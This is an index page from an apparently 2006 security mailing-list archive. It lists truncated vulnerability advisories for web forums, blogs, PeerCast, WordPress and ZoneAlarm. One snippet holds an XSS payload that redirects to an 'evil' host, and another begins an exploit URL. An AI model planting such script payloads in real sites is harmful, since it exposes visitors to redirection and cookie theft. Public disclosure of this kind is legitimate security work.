|
|
Colapse all |
Post message
MyBloggie: Multiple XSS Vulnerabilities 2006-03-09 enji seclab tuwien ac at =========================================================== MyBloggie: Multiple XSS Vulnerabilities =========================================================== Technical University of Vienna Security Advisory TUVSA-0603-002, March 9, 2006 =========================================================== [ more ] [ reply ] DCP Portal: Multiple XSS Vulnerabilities 2006-03-09 enji seclab tuwien ac at =========================================================== DCP Portal: Multiple XSS Vulnerabilities =========================================================== Technical University of Vienna Security Advisory TUVSA-0603-001, March 9, 2006 =========================================================== [ more ] [ reply ] ADP Forum 2.0,* script İnjection 2006-03-09 liz0 bsdmail com ADP Forum 2.0,* script İnjection ---------------------------------------------------- site:http://www.linux.it/~fedro/ demo:http://www.adp.host.sk/Forum203/ -------------------------------------------------- Post This Code: <script>alert(/Liz0ziM/)</script> <script>location.href="http://evil [ more ] [ reply ] M-Phorum Cross Site Scripting 2006-03-09 codexploder hotmail com ------------------------------------------------------------------------ ------------- M-Phorum Cross Site Scripting Site:http://m-phorum.sourceforge.net/site/ Credit : CodeXpLoder'tq webpage:www.biyosecurity.com Mail :codexploder (at) linuxmail (dot) org [email concealed] ----------------------------------------------- [ more ] [ reply ] INFIGO-2006-03-01: PeerCast streaming server remote buffer overflow 2006-03-09 infocus (infocus infigo hr) INFIGO IS Security Advisory #INFIGO-2006-03-01 http://www.infigo.hr/ Title: PeerCast streaming server remote buffer overflow Advisory ID: INFIGO-2006-03-01 Date: 2006-03-08 Advisory URL: http://www.infigo.hr/in_focus/INFIGO-2006-03-01 Impact: Remote code execution Risk Level: High Vulnera [ more ] [ reply ] Easy File Sharing Web Server Multiple Vulnerablilities 2006-03-09 revnic gmail com Easy File Sharing Web Server Multiple Vulnerablilities Software: Easy File Sharing Web Server Version: 3.2 Website: http://www.sharing-file.com/ Description: Easy File Sharing Web Server is a Windows program that allows you to host a secure peer-to-peer and web-based file sharing system without [ more ] [ reply ] Remote access to NeuSecure/Netcool backend database via web interface credentials leakage 2006-03-08 D.Snezhkov (dsnezhkov gmail com) [SECURITY] [DSA 989-1] New zoph packages fix SQL injection 2006-03-09 Moritz Muehlenhoff (jmm inutil org) HYSA-2006-005 WordPress 2.0.1 Remote DoS Exploit 2006-03-08 h4cky0u org gmail com ------------------------------------------------------ HYSA-2006-005 h4cky0u.org Advisory 014 ------------------------------------------------------ Date - Wed March 08 2006 TITLE: ====== WordPress 2.0.1 Remote DoS Exploit SEVERITY: ========= Medium SOFTWARE: ========= Wordpress 2.0.1 [ more ] [ reply ] nCipher Advisory #14: Presence of flaws in firmware security 2006-03-09 nCipher Support (technotifications us ncipher com) nCipher Advisory #13: CBC-MAC IV misleading programming interface 2006-03-08 nCipher Support (technotifications us ncipher com) Re: [waraxe-2006-SA#047] - Evading sql-injection filters in phpNuke 7.8 2006-03-08 omega13a sbcglobal net nCipher Advisory #12: Insecure Generation of Diffie-Hellman keys 2006-03-08 nCipher Support (technotifications us ncipher com) 18 ways to escalate privileges in Zone Labs ZoneAlarm Security Suite build 6.1.744.000 2006-03-08 Reed Arvin (reedarvin gmail com) (1 replies) Summary: 18 ways to escalate privileges in Zone Labs ZoneAlarm Security Suite build 6.1.744.000 (http://www.zonelabs.com/) Details: During Windows startup the TrueVector service (vsmon.exe - an integral piece of most Zone Labs products) is set to startup automatically. The TrueVector service runs u [ more ] [ reply ] Re: 18 ways to escalate privileges in Zone Labs ZoneAlarm Security Suite build 6.1.744.000 2006-03-09 3APA3A (3APA3A SECURITY NNOV RU) [ MDKSA-2006:054 ] - Updated kdegraphics packages fixes overflow vulnerabilities 2006-03-08 security mandriva com Re: a worm for mediaWiki?? 2006-03-08 jredmond ymcastlouis org "\"vitamona\"" <vitamona (at) gmail (dot) com [email concealed]> wrote on 03/08/2006 02:40:43 PM: > The highlight word on the varius articoles on mediaWiki was replace > with strange string like this: > NaodW29-pre1dc0e53c28ac067d00000016 This is due to changes in PHP 4.4.1 and 5.1.0RC, and was fixed in MediaWiki version 1.5. [ more ] [ reply ] a worm for mediaWiki?? 2006-03-08 \vitamona\ (vitamona gmail com) Hi, i've noticed a strange thing on MediaWiki that i used sometimes. The highlight word on the varius articoles on mediaWiki was replace with strange string like this: NaodW29-pre1dc0e53c28ac067d00000016 For look this on google see here: http://www.google.com/search?hl=en&lr=&q=NaodW29&btnG=Search [ more ] [ reply ] [KAPDA::#32] - d2kBlog 1.0.3 Multiple Vulnerabilities 2006-03-08 3nitro gmail com KAPDA New advisory Vulnerable products : d2kBlog <= 1.0.3 Vendor: http://www.d2ksoft.com/ Risk: Medium Vulnerabilities: SQL_Injection , Script Insertion Date : -------------------- Found : 2006/01/01 Vendor Contacted : 2006/01/02 Release Date : 2006/03/08 About D2KBlog : -------------------- Free [ more ] [ reply ] [SECURITY] [DSA 988-1] New squirrelmail packages fix several vulnerabilities 2006-03-08 Moritz Muehlenhoff (jmm debian org) capi4hylafax insecure manipulation with tmp files 2006-03-07 Javor Ninov (drfrancky securax org) capi4hylafax suite (http://freshmeat.net/projects/capi4hylafax/ ) is addon for hylafax fax server (http://www.hylafax.org/) vulnerable: capi4hylafax-01.03.00 /probably others/ in capi4hylafax-01.03.00/src/faxrecv/faxrecv.cpp : #ifdef GENERATE_DEBUGSFFDATAFILE dwarning (DebugSffDataFile == 0); [ more ] [ reply ] textfileBB <= 1.0 Multiple XSS 2006-03-08 retard 30gigs com ORIGIONAL: http://notlegal.ws/textfilebbmessanger.txt software: textfileBB vendors website: http://tfbb.jcink.com/ versions: <= 1.0 class: remote status: unpatched exploit: available solution: not available discovered by: retard risk level: medium exploit(s): http://example.com/messang [ more ] [ reply ] [eVuln] EKINboard 'img' BBCode XSS & Cookie 'username' SQL Injection Vulnerabilities 2006-03-08 alex evuln com New eVuln Advisory: EKINboard 'img' BBCode XSS & Cookie 'username' SQL Injection Vulnerabilities http://evuln.com/vulns/88/summary.html --------------------Summary---------------- eVuln ID: EV0088 Software: EKINboard Sowtware's Web Site: http://www.ekinboard.com/ Versions: 1.0.3 Critical Level: Mod [ more ] [ reply ] [security bulletin] HPSBTU02100 SSRT050979 rev.1 - HP Tru64 UNIX IPSEC/ISAKMP Remote Denial of Service (DoS) 2006-03-08 security-alert hp com -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00602119 Version: 1 HPSBTU02100 SSRT050979 rev.1 - HP Tru64 UNIX IPSEC/ISAKMP Remote Denial of Service (DoS) NOTICE: The information in this Security Bulletin should be acted upon as soon as po [ more ] [ reply ] H&R Block contact - SOLVED 2006-03-08 Fixer (fixer gci net) Thanks to everyone that helped with this one. I was able to get the issue resolved and a patch is forthcoming. -Fixer ------------------------------------------------------------------------ > *From:* Fixer [mailto:fixer (at) gci (dot) net [email concealed]] > *Sent:* Tue 2/21/2006 11:27 AM > *To:* bugtraq@securityfo [ more ] [ reply ] [FLSA-2006:176751] Updated gpdf package fixes security issues 2006-03-07 Marc Deslauriers (marcdeslauriers videotron ca) |
|
Privacy Statement |
txtForum: Multiple XSS Vulnerabilities
===========================================================
Technical University of Vienna Security Advisory
TUVSA-0603-003, March 9, 2006
===========================================================
[ more ] [ reply ]